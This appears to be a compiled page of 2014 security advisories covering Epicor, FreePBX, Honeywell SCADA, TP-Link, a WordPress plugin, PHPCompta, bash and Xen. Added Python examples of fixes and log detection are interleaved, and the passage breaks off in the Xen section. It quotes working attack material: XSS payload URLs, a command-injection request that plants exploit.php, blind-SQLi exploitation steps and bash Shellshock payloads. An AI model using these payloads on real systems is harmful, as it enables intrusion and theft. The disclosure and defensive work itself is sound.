
Fynloski dropper and .NET PWS (pass stealer) Analysis

Again the malware sample came to me via a spam campaign and was caught in a corporate network’s honeypot.

more here...........http://www.133tsec.com/2014/09/29/fynloski-dropper-and-net-pws-pass-stealer-analysis/

Epicor Enterprise vulnerabilities

"Epicor Enterprise vulnerabilities"

- Affected vendor: Epicor Software Corporation
- Affected system: Epicor Enterprise - Version 7.4
- Vendor disclosure date: May 13th, 2014
- Public disclosure date: September 30th, 2014
- Status: Fixed

- Associated CVEs:

  1) CVE-2014-4311
  Password values not masked appropriately:
  Even though the application appears to be masking the affected password values
in the database connection and email settings page, it is possible to access
their content by observing the HTML code.

  Affected password values:
  - “Database Connection”
  - “E-mail Connection”

  Associated CAPEC:
  CAPEC-167: Lifting Sensitive Data from the Client -
https://capec.mitre.org/data/definitions/167.html

  Associated CWE:
  CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html

  2) CVE-2014-4312
  Persistent and reflective cross-site scripting (XSS) attacks possible:
  The identified website is vulnerable to persistent and reflective cross-site
scripting. Script injection is a weakness within an application, and is due to
insufficient validation of the input data (i.e. input data being sent from the
user/presentation layer) and output encoding allowing dynamic execution of
scripts on the application front end resulting in anomalous/abnormal behaviour
of the application.

  Example of affected functionalities for persistent XSS:
   - 1. While viewing Order details, and injecting a malicious payload on the
"Notes" section.
   - 2. While modifying an “Order to consume” and injecting a malicious payload
on the "Description" section.
   - 3. While observing the “Favorites” section and injecting a malicious
payload on the “Favorites name” section.
     Example of an injected payload: <script>alert("XSS")</script>

  Example of affected URLs for reflective XSS:
  - 1.
https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword=<script>alert("XSS")</script>
  - 2.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt"><script>alert("XSS")</script>
  - 3. https://XXXXX
/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test"><script>alert("XSS")</script>
  - 4.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName="><script>alert("XSS")</script>
  - 5.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">--><script>alert("XSS")</script>

  Associated CAPEC:
  CAPEC-32: Embedding Scripts in HTTP Query Strings -
https://capec.mitre.org/data/definitions/32.html

  Associated CWE:
  CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html
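Both issues above come down to what the server writes into the HTML it sends. The following Python is an added example, not code from the advisory or from Epicor Enterprise: render_settings_unsafe reproduces the two flawed patterns (a stored secret placed in a password field's value attribute, which the browser masks on screen but the page source does not, and a user-supplied name interpolated without encoding, using the advisory's own alert payload), and render_settings_safe shows the corrected form. All function names, the STORED_DB_PASSWORD placeholder and the form layout are assumptions made for the example.

```python
import html

# Constructed sample inputs (not taken from the advisory): a stored secret and
# the advisory's example XSS payload used as a "Favorites name".
STORED_DB_PASSWORD = "s3cret-db-pass"          # constructed placeholder secret
XSS_PAYLOAD = '<script>alert("XSS")</script>'  # payload quoted in the advisory


def render_settings_unsafe(favorites_name, db_password):
    """Vulnerable pattern: raw interpolation into an HTML attribute, and the
    real secret echoed into a password field (masked by the browser, but
    readable by anyone who views the source or uses a DOM inspector)."""
    return (
        '<input name="favname" value="' + favorites_name + '">\n'
        '<input type="password" name="dbpass" value="' + db_password + '">'
    )


def render_settings_safe(favorites_name, password_is_set):
    """Hardened form: every untrusted value is HTML-encoded for the attribute
    context (quote=True also encodes the double quote, so a payload cannot
    close the attribute), and the secret is never sent to the client at all;
    the form only says whether one is set and accepts a replacement."""
    enc = html.escape(favorites_name, quote=True)
    marker = "(password set; leave blank to keep)" if password_is_set else "(not set)"
    return (
        '<input name="favname" value="' + enc + '">\n'
        '<input type="password" name="dbpass" value="" placeholder="'
        + html.escape(marker) + '">'
    )


def page_contains_secret_or_script(page, secret):
    """Check a rendered page for the two symptoms the advisory describes:
    the secret present in the markup, or an unencoded script tag."""
    return secret in page or "<script" in page.lower()
```

The safe renderer treats "the password is set" as the only fact the client needs; a change to the stored value happens only when the submitted field is non-empty, so nothing secret ever travels back to the browser.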

- Available fix:
  Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181

- Credit:
  These vulnerabilities were discovered by Fara Rustein.
  If you have any questions, comments, concerns, updates or suggestions please
contact Fara Rustein (TW: @fararustein).

Google’s DoubleClick ad network abused once again in malvertising attacks

Last week we uncovered a large-scale malvertising attack involving Google’s DoubleClick and Zedo that affected many high-profile sites.

Unfortunately, another incident where DoubleClick is part of the advertising chain has happened again.

more here...........https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/

FreePBX (All Versions) RCE

We would like to announce that a significant security vulnerability has
been discovered in all current versions of FreePBX.

A CVE has been requested from Mitre, but has yet to be provided.

Further details as they come to hand will be available from
http://community.freepbx.org/t/critical-freepbx-rce-vulnerability-all-versions/24536
which should be treated as the authoritative source of information. The CVE,
when provided, will be linked from there.

There is also further information available there about how to detect and
remove any potential intrusion to your FreePBX machine.

Summary:
A remote attacker can bypass authentication and create a false FreePBX
Administrator account, which will then let them perform any action on a
FreePBX system as the FreePBX user (which is often ‘asterisk’ or ‘apache’).

This vulnerability is caused by the improper use of ‘unserialize’ in a
legacy package that has been deprecated in the latest versions of FreePBX,
but is still in common use.

An emergency security release has been pushed to resolve this for all
supported versions (12, 2.11, and 2.10) as well as an emergency backport to
2.9, which is outside of our normal supported environment.

If you are running a version prior to 2.9, and are unable to upgrade, the
patch is available below.

The fixed module versions are:
2.9: fw_ari v2.9.0.9
2.10: fw_ari v2.11.1.5
2.11: fw_ari v2.11.1.5 (not a typo, it’s the same module version)

In FreePBX 12 ARI is deprecated in favour of the new User Control Panel,
but ARI is available as a legacy package if required, as version 12.0.5.

All versions lower than this are vulnerable and should be removed if unable
to be upgraded.

Note that disabling them will NOT resolve this issue, the files must be
removed or patched.

This issue was discovered by a signature verification failure on a FreePBX
12 system, and the attack appeared to be scripted. As such, this attack
should be considered to be ‘in the wild’, and upgrades should be actioned
with the utmost urgency.

FreePBX and Schmooze take security very seriously, and treat all security
issues as a critical event.  We urge anyone who has discovered a security
vulnerability in FreePBX, or its associated projects, to email
security@freepbx.org for an immediate response.

We also continue our recommendation that your FreePBX machines are
explicitly firewalled from public access from the internet.

Additional Details:

Overall CVSS Score - 6

CVSS Base Score - 9.4
Impact Subscore - 9.2
Exploitability Subscore - 10
CVSS Temporal Score  - 7.4
CVSS Environmental Score - 6
Modified Impact Subscore - 8

Link to patch:
https://github.com/FreePBX/fw_ari/commit/f294b4580ce725ca3c5e692d86e63d40cef4d836

FreePBX Security Team,
Schmooze Com Inc

CVE-2014-2717 SCADA Privilege Escalation in Honeywell Falcon XLWEB

After giving the market two extra months for patching and also
contacting some of the affected national CERTs, Outpost24 today released
the vulnerability details for CVE-2014-2717.
This vulnerability consists of a missing access restriction in
combination with a flawed login function, resulting in something as
exotic as a pass-the-hash vulnerability to authenticate with a SCADA
system, giving administrative access.*

*TL;DR: The Honeywell Falcon (XLWeb Linux/Webserver) contains a
vulnerability which allows anyone, even without knowing the username or
password, to log in as an administrator in the system. Although
information regarding the presence of the vulnerability has been
available for a few months since its open disclosure by ICS-CERT to
member organizations, multiple unpatched systems remain exposed to the
Internet. Outpost24 waited for an airport that we were aware was affected
to patch before releasing.

Fuller information is available here:
http://www.outpost24.com/cve-2014-2717-attacking-the-honeywell-falcon-xlweb/

References:
https://ics-cert.us-cert.gov/advisories/ICSA-14-175-01
CVE-2014-2717


AFFECTED PRODUCTS
The following Honeywell FALCON XLWeb controller versions are affected:

  * FALCON Linux 2.04.01 or older
  * FALCON XLWebExe 2.02.11 or older.

IMPACT
An attacker may use these vulnerabilities to generate a valid login for
an administrative user in the Honeywell FALCON XLWeb controller
obtaining full administrator access to the system.

The impact to individual organizations depends on many factors that are
unique to each organization. ICS-CERT recommends that organizations
evaluate the impact of this vulnerability based on their operational
environment, architecture and product implementation.

The affected products, FALCON XLWeb controllers, are web-based SCADA
systems. According to Honeywell, FALCON XLWeb controllers are deployed
across several industries including critical manufacturing, energy and
wastewater systems among others. According to Honeywell, the affected
controllers are used by customers primarily in Europe and the Middle East.

Outpost24 would like to thank Honeywell and ICS-CERT for their fast work
in resolving the problems, and we also completely share the vendor's
recommendation that SCADA systems should not be internet-facing in the
first place. The vendor has been a pleasure to work with and has taken
every care to resolve the issue in a timely manner.


Martin Jartelius
CSO
Outpost24
www.outpost24.com

Multiple product vulnerabilities: all TP-Link "2-series" switches, all TP-Link VxWorks-based products

Vendor affected: TP-Link (http://tp-link.com)

Products affected:
  * All TP-Link VxWorks-based devices (confirmed by vendor)
  * All "2-series" switches (confirmed by vendor)
  * TL-SG2008 semi-managed switch (confirmed by vendor)
  * TL-SG2216 semi-managed switch (confirmed by vendor)
  * TL-SG2424 semi-managed switch (confirmed by vendor)
  * TL-SG2424P semi-managed switch (confirmed by vendor)
  * TL-SG2452 semi-managed switch (confirmed by vendor)

Vulnerabilities:
  * All previously-reported VxWorks vulnerabilities from 6.6.0 on;
    at the very least:
    * CVE-2013-0716 (confirmed by vendor)
    * CVE-2013-0715 (confirmed by vendor)
    * CVE-2013-0714 (confirmed by vendor)
    * CVE-2013-0713 (confirmed by vendor)
    * CVE-2013-0712 (confirmed by vendor)
    * CVE-2013-0711 (confirmed by vendor)
    * CVE-2010-2967 (confirmed by vendor)
    * CVE-2010-2966 (confirmed by vendor)
    * CVE-2008-2476 (confirmed by vendor)
  * SSLv2 is available and cannot be disabled unless HTTPS is
    completely disabled (allows downgrade attacks)
    (confirmed by vendor)
  * SSL (v2, v3) offers insecure cipher suites and HMACs which cannot
    be disabled (allows downgrade attacks)
    (confirmed by vendor)

Design flaws:
  * Telnet is available and cannot be disabled (confirmed by vendor)
  * SSHv1 enabled by default if SSH is enabled (confirmed by vendor)

Vendor response:
  TP-Link are not convinced that these flaws should be repaired.

  TP-Link's Internet presence -- or at least DNS -- is available only
  intermittently. Most emails bounced. Lost contact with vendor, but
  did confirm that development lead is now on holiday and will not
  return for at least a week.

  Initial vendor reaction was to recommend purchase of "3-series"
  switches. Vendor did not offer reasons why "3-series" switches would
  be more secure, apart from lack of telnet service. Vendor confirmed
  that no development time can be allocated to securing "2-series"
  product and all focus has shifted to newer products.

  (TL-SG2008 first product availability July 2014...)

  Vendor deeply confused about security of DES/3DES, MD5, claimed that
  all security is relative. ("...[E]ven SHA-1 can be cracked, they just
  have different security level.")

Fix availability:
  None.

Work-arounds advised:
  None possible. Remove products from network.



Authored by kvnjs 
kvnjs@riseup.net



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Lacoon Discovers Xsser mRAT, the First Advanced iOS Trojan

The Lacoon Mobile Security research team has discovered a new mRAT it calls “Xsser mRAT.” The Xsser mRAT specifically targets iOS devices, and is related to Android spyware already distributed broadly in Hong Kong.

more here.........https://www.lacoon.com/lacoon-discovers-xsser-mrat-first-advanced-ios-trojan/

OpenVPN ShellShock PoC

# OpenVPN ShellShock PoC
# Based on Fredrik Strömberg's HN post: https://news.ycombinator.com/item?id=8385332
# Verified by @fj33r, posted at: http://sprunge.us/BGjP

PoC here............http://pastebin.com/VyMs3rRd

Digging deep into Angler Fileless Exploit delivery

We look in detail about Angler Exploit pack’s fileless infection. Thanks to friends at malware-traffic-analysis.net who provided captures of two different instances of Angler exploit pack delivery. You can download the samples and captures from these links Link1, Link2. There is one technical blog about this infection chain. I am going to add in some more information about this particular instance.

more here...........http://hiddencodes.wordpress.com/2014/10/01/digging-deep-into-angler-fileless-exploit-delivery-2/

Quick and dirty configuration of Viper to add "cloud" support

Viper is an open source framework designed to assist malware analysis. You can find more information here. I really like this framework and use it every day. However, it is not possible to natively use it in the "cloud": Viper does not provide a server or multi-user support. I'll describe here a configuration to add this feature.

more here..........http://r00ted.com/Quick_and_dirty_viper_configuration.html


Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes (WordPress plugin)

Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)

Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes

Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.

Proof of concept
================
Steps an attacker may take:

Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat

Steps to take to verify that this issue exists:

Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like
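The flaw described above, as an added example written in Python rather than the plugin's PHP (this is neither the plugin's code nor dxw's): an in-memory SQLite table with constructed rows stands in for wp_posts, outdated_ids_unsafe pastes the saved option value into the query the way the advisory describes, and outdated_ids_safe validates the option against the registered content types before use and binds every value as a parameter. The table layout, REGISTERED_POST_TYPES and the row data are assumptions for the example; the cutoff date is the one that appears in the advisory's error message.

```python
import sqlite3

# Content types the site has registered (constructed allowlist for the example).
REGISTERED_POST_TYPES = {"post", "page", "attachment"}


def make_db():
    """Build a small in-memory stand-in for wp_posts with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (ID INTEGER, post_type TEXT, post_modified TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", [
        (1, "post", "2013-01-05"),
        (2, "page", "2013-06-30"),
        (3, "post", "2014-09-01"),
        (4, "attachment", "2012-12-01"),
    ])
    return conn


def outdated_ids_unsafe(conn, audited_types, cutoff):
    """The flawed pattern: the option value saved from the checkbox is pasted
    straight into the SQL text. A value of a single quote breaks the statement
    (the symptom the advisory shows with MySQL) and anything else becomes
    live SQL that runs with the database user's privileges."""
    type_list = "','".join(audited_types)
    sql = ("SELECT ID FROM posts WHERE post_type IN ('%s') "
           "AND post_modified < '%s' ORDER BY ID" % (type_list, cutoff))
    return [row[0] for row in conn.execute(sql)]


def outdated_ids_safe(conn, audited_types, cutoff):
    """Hardened version: reject any value that is not a registered content
    type (the checkbox value can be edited client-side, so it is untrusted
    input like any other), then bind the values with placeholders so the
    database never interprets them as SQL."""
    bad = [t for t in audited_types if t not in REGISTERED_POST_TYPES]
    if bad:
        raise ValueError("unknown content type(s): %r" % bad)
    placeholders = ",".join("?" * len(audited_types))
    sql = ("SELECT ID FROM posts WHERE post_type IN (%s) "
           "AND post_modified < ? ORDER BY ID" % placeholders)
    return [row[0] for row in conn.execute(sql, (*audited_types, cutoff))]
```

The allowlist check belongs at the point where the option is saved as well as where it is read; a stored value that was never validated is still attacker input when the cron job picks it up a day later.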


Mitigations
================
You should update to version 1.62.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

CVE-2014-6389 - Remote Command Execution in PHPCompta/NOALYSS

Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS
CVE: CVE-2014-6389
Vendor: PHPCompta
Product: PHPCompta/NOALYSS
Affected version: 6.7.1 5638
Fixed version: 6.7.2
Reported by: Jerzy Kramarz

Details:

PhpCompta 6.7.1-2 does not validate the syntax of the commands when processing backup requests from users. It is possible to abuse the 'd' parameter to inject additional parameters that will then be passed via the PHP passthru() function to create a backup file, which will subsequently be executed. The proof of concept below will create a file 'exploit.php' in the root directory of the application, which will execute the phpinfo() function when called.

GET /phpcompta/backup.php?sa=b&t=m&d=123;%20echo%20%22%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%22%20>%20exploit.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3nckv75pburv54tm2iq79dfgl6
Connection: keep-alive
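An added example (not PHPCompta's code and not part of the Portcullis advisory) of the difference between concatenating a request parameter into a shell command line, which is what a passthru()-style call executes, and validating the parameter and passing it as a single argument-vector element with no shell involved. INJECTED_D is the advisory's 'd' value after URL decoding; the backup_tool program name, its --dump flag and the assumption that 'd' is meant to be a numeric identifier are constructed for the example.

```python
import re
import subprocess
import sys

# The advisory's 'd' parameter, URL-decoded (constructed from the request shown above).
INJECTED_D = '123; echo "<?php phpinfo();?>" > exploit.php'

# Assumption for the example: 'd' is meant to be a plain numeric identifier.
D_PATTERN = re.compile(r"^[0-9]{1,20}$")


def backup_command_unsafe(d):
    """The flawed pattern: the request parameter is concatenated into a shell
    command line, so ';' terminates the intended command and a second command
    chosen by the requester runs afterwards."""
    return "backup_tool --dump " + d


def backup_argv_safe(d):
    """Hardened version: validate the parameter against a strict pattern, then
    build an argument vector to be executed without a shell (backup_tool is a
    hypothetical program name)."""
    if not D_PATTERN.match(d):
        raise ValueError("invalid backup parameter")
    return ["backup_tool", "--dump", d]


def argv_roundtrip(value):
    """Show that an argument vector carries text through literally even when
    it contains shell metacharacters: a Python child process stands in for the
    backup program and simply echoes back its first argument."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True)
    return proc.stdout
```

Validation comes first because even a shell-free argument vector can be abused when the called program interprets its own arguments (options beginning with '-', for instance); the pattern check limits the parameter to the shape the application actually needs.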

Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6389/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.



The other bash RCEs (CVE-2014-6277 and CVE-2014-6278)

== Background ==

If you are not familiar with the original bash function export
vulnerability (CVE-2014-6271), you may want to have a look at this
article:

http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html

Well, long story short: the initial maintainer-provided patch for this
issue [1] (released on September 24) is *conclusively* broken.

After nagging people to update for a while [5] [7], I wanted to share
the technical details of two previously non-public issues which may be
used to circumvent the original patch: CVE-2014-6277 and
CVE-2014-6278.

Note that the issues discussed here are separate from the three
probably less severe problems publicly disclosed earlier on: Tavis'
limited-exploitability EOL bug (CVE-2014-7169) and two likely
non-exploitable one-off issues found by Florian Weimer and Todd Sabin
(CVE-2014-7186 and CVE-2014-7187).

== Required actions ==

If you have installed just the September 24 patch [1], or that and the
follow-up September 26 patch for CVE-2014-7169 [2], you are likely
still vulnerable to RCE and need to update ASAP, as discussed in [5].

You are safe if you have installed the unofficial function prefix
patch from Florian Weimer [3], or its upstream variant released on
September 28 [4]. The patch does not eliminate the problems, but
shields the underlying parser from untrusted inputs under normal
circumstances.

Note: over the past few days, Florian's patch has been picked up by
major Linux distros (Red Hat, Debian, SUSE, etc), so there is a
reasonable probability that you are in good shape. To test, execute
this command from within a bash shell:

foo='() { echo not patched; }' bash -c foo

If you see "not patched", you probably want to upgrade immediately. If
you see "bash: foo: command not found", you're OK.

== Vulnerability details: CVE-2014-6277 (the more involved one) ==

The following function definition appearing in the value of any
environmental variable passed to bash will lead to an attempt to
dereference attacker-controlled pointers (provided that the targeted
instance of bash is protected only with the original patches [1][2]
and does not include Florian's fix):

() { x() { _; }; x() { _; } <<a; }

A more complete example leading to a deref of 0x41414141 would be:

HTTP_COOKIE="() { x() { _; }; x() { _; } <<`perl -e '{print "A"x1000}'`; }" bash -c :

bash[25662]: segfault at 41414141 ip 00190d96 sp bfbe6354 error 4 in
libc-2.12.so[110000+191000]

(If you are seeing 0xdfdfdfdf, see note later on).

The issue is caused by an uninitialized here_doc_eof field in a REDIR
struct originally created in make_redirection(). The initial segv will
happen due to an attempt to read and then copy a string to a new
buffer through a macro that expands to:

strcpy (xmalloc (1 + strlen (redirect->here_doc_eof)), (redirect->here_doc_eof))

This appears to be exploitable in at least one way: if here_doc_eof is
chosen by the attacker to point in the vicinity of the current stack
pointer, the apparent contents of the string - and therefore its
length - may change between stack-based calls to xmalloc() and
strcpy() as a natural consequence of an attempt to pass parameters and
create local variables. Such a mid-macro switch will result in an
out-of-bounds write to the newly-allocated memory.

A simple conceptual illustration of this attack vector would be:

-- snip! --
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char* result;
int len_alloced;

int main(int argc, char** argv) {

  /* Point into the live stack frame. The offset is system- and
     compiler-specific, so this is an illustration, not a portable test. */
  char* ptr = (char*) (&ptr - 9);

  /* strlen() runs first and fixes the allocation size; the call sequence
     then disturbs the stack, so by the time strcpy() reads the same bytes
     the "string" may be longer than the buffer allocated for it. */
  result = strcpy (malloc(100 + (len_alloced = strlen(ptr))), ptr);

  printf("requested memory = %d\n"
         "copied text = %d\n", len_alloced + 1, (int) strlen(result) + 1);

  return 0;
}
-- snip! --

When compiled with the -O2 flag used for bash, on one test system,
this produces:

requested memory = 2
copied text = 28

This can lead to heap corruption, with multiple writes possible per
payload by simply increasing the number of malformed here-docs. The
consequences should be fairly clear.

[ There is also a later call to free() on here_doc_eof in
dispose_cmd.c, but because of the simultaneous discovery of the much
simpler bug '78 discussed in the next section, I have not spent a
whole lot of time trying to figure out how to get to that path. ]

Perhaps notably, the ability to specify attacker-controlled addresses
hinges on the state of --enable-bash-malloc and --enable-mem-scramble
compile-time flags; if both are enabled, the memory returned by
xmalloc() will be initialized to 0xdf, making the prospect of
exploitation more speculative (essentially depending on whether the
stack or any other memory region can be grown to overlap with
0xdfdfdfdf). That said, many Linux distributions disable one or both
flags and are vulnerable out-of-the-box. It is also of note that
relatively few distributions compile bash as PIE, so there is little
consolation to be found in ASLR.

Similarly to the original vulnerability, this issue can be usually
triggered remotely through web servers such as Apache (provided that
they invoke CGI scripts or PHP / Python / Perl / C / Java servlets
that rely on system() or popen()-type libcalls); through DHCP clients;
and through some MUAs and MTAs. For a more detailed discussion of the
exposed attack surface, refer to [6].

== Vulnerability details: CVE-2014-6278 (the "back to the '90s" one) ==

The following function definition appearing in the value of any
environmental variable passed to bash 4.2 or 4.3 will lead to
straightforward put-your-command-here RCE (again, provided that the
targeted instance is not protected with Florian's patch):

() { _; } >_[$($())] { echo hi mom; id; }

A complete example looks like this:

HTTP_COOKIE='() { _; } >_[$($())] { echo hi mom; id; }' bash -c :

...or:

GET /some/script.cgi HTTP/1.0
User-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom; }

Note that the PoC does not work as-is in more ancient versions of
bash, such as 2.x or 3.x; it might have been introduced with
xparse_dolparen() starting with bash 4.2 patch level 12 a few years
back, but I have not investigated this in a lot of detail. Florian's
patch is strongly recommended either way.

The attack surface through which this flaw may be triggered is roughly
similar to that for CVE-2014-6277 and the original bash bug [6].
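Added example, not lcamtuf's code: a small Python detector that flags web-server log lines carrying the function-definition prefix shared by the original bug and by the CVE-2014-6277 and CVE-2014-6278 payloads shown in this post, run over constructed sample lines (one carries the CVE-2014-6278 User-Agent quoted above, one the fuzzer seed quoted in the "Additional info" section), together with a wrapper around the post's own environment-function check. The log format and addresses are constructed; the regex is deliberately broad and will also flag benign text that happens to contain "() {", so it is a triage signal, not proof of compromise.

```python
import re
import subprocess

# A bash exported-function definition begins with "() {" (optional whitespace
# in between). All of the payloads in this post start that way, whatever bash
# version they go on to exploit, so this is the prefix worth alerting on.
FUNCTION_EXPORT = re.compile(r"\(\)\s*\{")

# Constructed access-log lines in a combined-log style with the User-Agent
# field last (constructed for this example, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.0" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Oct/2014:10:00:02 +0000] "GET /some/script.cgi HTTP/1.0" 200 12 "-" "() { _; } >_[$($())] { id >/tmp/hi_mom; }"',
    '10.0.0.9 - - [01/Oct/2014:10:00:03 +0000] "GET /some/script.cgi HTTP/1.0" 200 12 "-" "() { foo() { foo; }; >bar; }"',
    '10.0.0.7 - - [01/Oct/2014:10:00:04 +0000] "GET /index.html HTTP/1.0" 200 12 "-" "curl/7.37.0 () test"',
]


def flag_function_exports(lines):
    """Return (line_number, excerpt) for every log line that carries the
    function-definition prefix anywhere in its request or header fields."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = FUNCTION_EXPORT.search(line)
        if m:
            hits.append((n, line[m.start():m.start() + 40]))
    return hits


def bash_env_function_check(bash="bash"):
    """Run the post's own check: place a function definition in the
    environment under the plain name 'foo' and see whether bash imports it.
    Returns "not patched", "patched", or None if bash could not be run here.
    A bash with the function-prefix patch ignores the variable and reports
    'foo: command not found' on stderr instead."""
    env = {"foo": "() { echo not patched; }", "PATH": "/usr/local/bin:/usr/bin:/bin"}
    try:
        proc = subprocess.run([bash, "-c", "foo"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "not patched" if "not patched" in proc.stdout else "patched"
```

Run the log check against whatever fields your server logs for each request; the two CVEs here arrive through the same header and environment channels as the original bug, so a User-Agent-only rule misses payloads delivered in Cookie, Referer or custom headers.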

== Additional info ==

Both of these issues were identified in an automated fashion with
american fuzzy lop:

https://code.google.com/p/american-fuzzy-lop

The out-of-the-box fuzzer was seeded with a minimal valid function
definition ("() { foo() { foo; }; >bar; }") and allowed to run for a
couple of hours on a single core.

In addition to the issues discussed above, the fuzzer also hit three
of the four previously-reported CVEs.

I initially shared the findings privately with vendors, but because of
the intense scrutiny that this codebase is under, the ease of
reproducing these results with an open-source fuzzer, and the
now-broad availability of upstream mitigations, there seems to be
relatively little value in continued secrecy.

== References ==

[1] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025
[2] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026
[3] http://www.openwall.com/lists/oss-security/2014/09/25/13
[4] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027
[5] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
[6] http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
[7] http://www.pcworld.com/article/2688932/improved-patch-tackles-new-shellshock-attack-vectors.html

PS. There are no other bugs in bash.

Authored by Michal Zalewski 
Email: lcamtuf@coredump.cx

Memory leak in Xen hypervisor via RDMSR emulation bug (XSA 108)

Problem description 
--------------------- 

This is a bug in the upstream Xen. Below is the description provided by 
the Xen Security Team: 

"The MSR range specified for APIC use in the x2APIC access model spans 
256 MSRs. Hypervisor code emulating read and write accesses to these 
MSRs erroneously covered 1024 MSRs. While the write emulation path is 
written such that accesses to the extra MSRs would not have any bad 
effect (they end up being no-ops), the read path would (attempt to) 
access memory beyond the single page set up for APIC emulation." 

In other words, the bug allows a malicious HVM guest to read some 
contents of the hypervisor memory. 


Discussion of practical impact 
-------------------------------- 

This very bug got lots of attention on public forums in recent days,
so we think a more detailed discussion is justified.

This seemingly looks like a serious problem, but if we think a little
bit about the practical impact the conclusion might be quite different.

First, there are really no secrets or keys in the hypervisor memory that
might make a good target for an exploit here. The Xen hypervisor does not
do encryption, nor does it deal with any storage subsystems. Also there is
no explicit guest memory content intermixed with the hypervisor code and
data.

But one place to see pieces of potentially sensitive data are the Xen 
internal structures where the guest _registers_ are stored whenever the 
